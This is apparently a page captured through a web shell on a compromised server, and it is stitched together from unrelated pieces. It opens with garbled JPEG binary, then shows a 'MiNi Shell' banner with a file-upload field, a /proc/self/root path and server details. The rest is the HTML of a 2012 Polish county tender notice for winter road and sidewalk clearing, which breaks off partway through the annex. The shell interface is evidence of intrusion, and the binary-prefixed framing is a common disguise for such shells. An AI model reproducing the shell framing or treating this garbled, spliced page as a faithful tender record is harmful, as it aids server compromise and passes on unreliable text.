JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121128/251429-N-2012.html

<p class="kh_header"><b>Przasnysz: Zimowe utrzymanie dróg powiatowych na terenie Powiatu Przasnyskiego</b><br>
<b>Numer ogłoszenia: 251429 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Przasnyski - Powiatowy Zarząd Dróg , ul. Gdańska 4, 06-300 Przasnysz, woj. mazowieckie, tel. 029 752-27-28, faks 029 752-27-28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-przasnysz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych na terenie Powiatu Przasnyskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zimowe utrzymanie dróg powiatowych na terenie powiatu przasnyskiego przez pracę  pojazdów  samochodowych jako nośników  solarko-piaskarek, pługów odśnieżnych  i innego sprzętu samobieżnego . W związku zakresem wykonywanych prac przedmiot zamówienia został podzielony na 7 części.

Część 1 - świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy kompletnego zestawu wykonawcy tj. nośnik sprzętu, solarka, pług odśnieżny. Wykonawca zapewnia 1 kompletny zestaw.
Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pług odśnieżny powinien posiadać masę własną nie mniejszą niż 400 kg. Samochód powinien być wyposażony w pomarańczową lampę ostrzegawczą.

Część 2 - świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy kompletnego zestawu wykonawcy tj. nośnik sprzętu, piaskarka, pług odśnieżny. Wykonawca zapewnia 2 kompletne zestawy.

Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pług odśnieżny powinien posiadać masę własną nie mniejszą niż 400 kg. Samochody powinny być wyposażone w pomarańczowe lampy ostrzegawcze.
Część 3 - świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy nośnika Wykonawcy. Pług odśnieżny i piaskarkę dostarczy Zamawiający. Wykonawca zapewnia 2 nośniki.

Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pojazd wyposażony w czołownicę do zamontowania pługu odśnieżnego oraz ramę nośną lub skrzynie ładunkową umożliwiającą zamontowanie piaskarki. Piaskarkę oraz pług odśnieżny dostarczy Zamawiający. Samochody powinny być wyposażone w pomarańczowe lampy ostrzegawcze.

Część 4 - świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy sprzętu ciężkiego. Pojazdy powinny być wyposażone w pomarańczowe lampy ostrzegawcze. Wykonawca zapewnia 4 sztuki sprzętu ciężkiego.

Koparko ładowarka z pługiem dwustronnym lub jednostronnych o mocy silnika min 80 KM. (2 szt.)
Ciągniki rolnicze z pługiem dwustronnym lub jednostronnym o mocy silnika min100 KM (1 szt.)
Ładowarka tupu FADROM z pługiem dwustronnym o min mocy silnika 160 KM (1 szt.) 

Część 5 - świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy równiarki. Wykonawca zapewnia 2 sztuki.

Równiarka powinna być wyposażona w odkładnicę stalową z lemieszem stalowych oraz o minimalnej mocy silnika 75 KM. Pojazd powinien być wyposażony w pomarańczową lampę ostrzegawczą.
Pojazdy dla części 1-3 będą brały udział w akcji zimowego odśnieżania dróg (odśnieżanie dróg w zależności od standardu danej drogi oraz zwalczaniu śliskości na drogach poprzez posypywanie solą, mieszaniną soli z piaskiem 50% i 4%)

Część 6 - świadczenie usług przy akcji zimowego utrzymania dróg poprzez mechaniczne odśnieżanie chodników. Wykonawca zapewnia 1 szt. 

Wykonawca do odśnieżania chodników użyje sprzętu mechanicznego do odśnieżania chodników. Pojazd powinien być wyposażony w pomarańczową lampę ostrzegawczą.

Część 7 - świadczenie usług przy akcji zimowego utrzymania dróg poprzez ręczne odśnieżanie chodników

Wykonawca odśnieży chodniki metodą ręczną za pomocą łopat odśnieżnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 u.p.z.p.  stanowiących nie więcej niż 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły /spełnia-nie spełnia/ na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły /spełnia-nie spełnia/ na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie 1 kompletny zestaw tj. nośnik sprzętu, solarka, pług odśnieżny. 
Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pług odśnieżny powinien posiadać masę własną nie mniejszą niż 400 kg. Samochód będzie wyposażony w pomarańczową lampę ostrzegawczą.
Część 2 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie 2 kompletnych zestawów tj. nośnik sprzętu, piaskarka, pług odśnieżny. 

Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pług odśnieżny powinien posiadać masę własną nie mniejszą niż 400 kg. Samochody będą wyposażone w pomarańczowe lampy ostrzegawcze.

Część 3 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie 2 nośników sprzętu. Pługi odśnieżne i piaskarki dostarczy Zamawiający.

Nośnikiem sprzętu jest samochód ciężarowy o dopuszczalnej masie całkowitej min 15 ton. Pojazd wyposażony w czołownicę do zamontowania pługu odśnieżnego oraz ramę nośną lub skrzynie ładunkową umożliwiającą zamontowanie piaskarki. Piaskarkę oraz pług odśnieżny dostarczy Zamawiający. Samochody będą wyposażone w pomarańczowe lampy ostrzegawcze. 

Część 4 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie 4 sztuk sprzętu. Pojazdy będą wyposażone w pomarańczowe lampy ostrzegawcze
1)	Koparko ładowarka z pługiem dwustronnym lub jednostronnych o mocy silnika min 80 KM. (2 szt.)
2)	Ciągniki rolnicze z pługiem dwustronnym lub jednostronnym o mocy silnika min 80 KM (1 szt.)
3)	Ładowarka tupu FADROM z pługiem dwustronnym o min mocy silnika 160 KM (1 szt.) 

Część 5 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie 2 równiarek.

Równiarka powinna być wyposażona w odkładnicę stalową z lemieszem stalowych oraz o minimalnej mocy silnika 75 KM. Pojazd powinien być wyposażony w pomarańczową lampę ostrzegawczą.

Część 6 - do realizacji tej części zamówienia Wykonawca musi wykazać posiadanie pojazdu mechanicznego wyposażonego w pług wirnikowy.

Wykonawca do odśnieżania chodników użyje sprzętu mechanicznego do odśnieżania chodników. Pojazd powinien być wyposażony w pomarańczową lampę ostrzegawczą. Pojazd może być wyposażony w pług odśnieżny, pług wirnikowy - dmuchawę lub inne urządzenie o podobnej efektywności pracy. Szerokość robocza min 120 cm

Część 7 - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły /spełnia-nie spełnia/ na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu i załącznika nr 6 do SIWZ Wzór wykazu posiadanego sprzętu niezbędnego do realizacji przedmiotu zamówienia dotyczy to części 1-6, dla części 7 na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły /spełnia-nie spełnia/ na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu i załącznika nr 7 do SIWZ Wzór oświadczenia o posiadanych uprawnieniach wymaganych prawem przez osoby  biorące udział w realizacji  zamówienia dotyczy to części 1-6, dla części 7 na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana wg formuły /spełnia-nie spełnia/ na podstawie załącznika nr 4 do SIWZ Wzór oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian przedmiotu lub terminu wykonania umowy:
1)	W przypadku gdy Wykonawca nie zgodzi się na montaż urządzenia GPS i wykorzystywanie tego urządzenia do monitorowania i rozliczania rzeczowo-finansowego wykonanej usługi;
2)	z powodu zaistnienia omyłki pisarskiej lub rachunkowej;
3)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, które zaakceptuje na piśmie Zamawiający;
4)	Jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia jednej lub obu stron;
5)	Jeżeli powstaną rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana treści umowy będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony;
6)	jeżeli nastąpi konieczność wprowadzenia zmian w przebiegu realizacji poszczególnych elementów zamówienia poprzez przesunięcie w czasie, uszczegółowienie lub inną zmianę zakresu, które będą spowodowane czynnikami niezależnymi od Wykonawcy; 
7)	Jeżeli nastąpi konieczność skrócenia terminu wykonania przedmiotu umowy ze względu na konieczność wprowadzenia zmian sposobu realizacji elementów usług lub wprowadzenia usług zamiennych lub rezygnacji z wykonania niektórych elementów usług przedmiotu zamówienia i możliwe będzie skrócenie z tego powodu terminu zakończenia realizacji zamówienia określonego w niniejszej umowie;
8)	Jeżeli nastąpi konieczność zmiany terminu z powodu działań osób trzecich uniemożliwiających realizację usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron;
9)	Siły wyższej, to znaczy niezależnego od Stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo zachowania należytej staranności; np. panujących bardzo niekorzystnych warunków atmosferycznych (intensywne opady śniegu, śnieżyce, zamiecie, zawieje, padanie marznącego deszczu itp.)
10)	Zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-przasnysz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg
ul. Gdańska 4, 06-300 Przasnysz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 11:00, miejsce: Siedziba Powiatowego Zarządu Dróg
ul. Gdańska 4, 06-300 Przasnysz 
I piętro, pokój nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy kompletnego zestawu wykonawcy tj. nośnik sprzętu, solarka, pług odśnieżny. Wykonawca zapewnia 1 kompletny zestaw..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 250
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy kompletnego zestawu wykonawcy tj. nośnik sprzętu, piaskarka, pług odśnieżny. Wykonawca zapewnia 2 kompletne zestawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 420
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy nośnika Wykonawcy. Pług odśnieżny i piaskarkę dostarczy Zamawiający. Wykonawca zapewnia 2 nośniki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 420
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy sprzętu ciężkiego. Pojazdy powinny być wyposażone w pomarańczowe lampy ostrzegawcze. Wykonawca zapewnia 4 sztuki sprzętu ciężkiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 370
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg na terenie powiatu przasnyskiego przy pomocy równiarki. Wykonawca zapewnia 2 sztuki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 92
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-9, 90.62.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> świadczenie usług przy akcji zimowego utrzymania dróg poprzez mechaniczne odśnieżanie chodników. Wykonawca zapewnia 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywana ilość roboczo godzin na sezon wynosi 100
UWAGA: Dla każdej z części zamówienia, ilość jednostek pracy (roboczo godzin) jest wielkością umowną dla porównania złożonych ofert. Ostateczna ilość jednostek (roboczo godzin) uzależniona będzie od bieżącego zapotrzebowania wynikającego z panujących warunków pogodowych..</p></li>
